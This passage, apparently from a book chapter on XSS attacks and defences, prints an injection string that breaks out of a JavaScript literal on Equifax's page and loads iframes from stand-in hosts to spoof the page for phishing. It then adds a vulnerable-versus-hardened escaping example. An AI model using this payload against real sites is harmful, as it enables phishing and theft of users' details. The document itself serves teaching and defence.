XSS Attacks - Exploits and Defense

XSS Exploited • Chapter 6


phisher is that an iframe leaves a trail, which means the phisher will have to upload the target page for the iframe to a server that will not lead back to the identity of the phisher. The complete injection code looks as follows. We added line breaks for readability.

    '; iframe=String.fromCharCode(60)+
    _'iframe src=http://evilserver.com/tequifax.htm
    _width=100% frameborder=0 scrolling=no'+String.fromCharCode(62);
    rightcolumn=String.fromCharCode(60)+'iframe
    _src=http://evilsite.com/tests/equifax2.htmwidth=100%
    _frameborder=0 scrolling=no height=400'+String.fromCharCode(62);
    document.getElementById('content').innerHTML=iframe;
    document.getElementById('rightcol').innerHTML=rightcolumn;
    test='asdf

This string first closes the JavaScript line that we are injecting the code into on Equifax’s Web page. Then we create a variable named iframe that holds the HTML characters needed to create an iframe pointing to our evilserver.com. Next, we create a variable named rightcolumn that holds the HTML needed to provide a “New User” part of the spoofed page. Note that we are using the String.fromCharCode() function to create the < and > characters. Finally, we overwrite the existing HTML content of the ‘content’ and ‘rightcol’ div areas of the existing Web page with the content in iframe and rightcolumn, which loads the iframe contents inside the target div tag areas. The end result looks like Figure 6.5.

Figure 6.5 Spoofed Equifax Page
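The injection works because user input lands unescaped inside a quoted JavaScript string. The following added example (not from the book) shows that reflection point next to a hardened version and checks both against a stub `document`. The `var query='...'` statement, the helper names, and the sample input are assumptions constructed for illustration.

```javascript
// Added example. Equifax's real page code is not shown in the text, so the
// reflection point `var query='<input>';` below is a hypothetical stand-in.

// Constructed sample input with the same shape as the string in the text:
// close the literal, overwrite the 'content' div, reopen a literal.
const SAMPLE_INPUT =
  "'; document.getElementById('content').innerHTML='REPLACED'; test='asdf";

// Vulnerable: the value is placed between single quotes without escaping.
function renderVulnerable(value) {
  return "var query='" + value + "';";
}

// Hardened: every non-alphanumeric UTF-16 unit becomes \uXXXX, so the value
// cannot close the string literal or the surrounding <script> element.
function jsStringEscape(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderHardened(value) {
  return "var query='" + jsStringEscape(value) + "';";
}

// Run a rendered inline script against a stub document and report which
// element ids had innerHTML overwritten, plus the final value of `query`.
function runInline(script) {
  const writes = {};
  const stubDocument = {
    getElementById: (id) => ({ set innerHTML(v) { writes[id] = v; } }),
  };
  const query = new Function('document', script + '\nreturn query;')(stubDocument);
  return { writes, query };
}

const vulnerable = runInline(renderVulnerable(SAMPLE_INPUT));
const hardened = runInline(renderHardened(SAMPLE_INPUT));
console.log('vulnerable wrote to:', Object.keys(vulnerable.writes));
console.log('hardened wrote to:', Object.keys(hardened.writes));
console.log('hardened kept input as data:', hardened.query === SAMPLE_INPUT);
```

The same escaping also covers the `<` and `>` characters, so it does not matter whether they arrive literally or are built at run time with String.fromCharCode(): once the quote cannot be closed, none of the injected statements execute.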
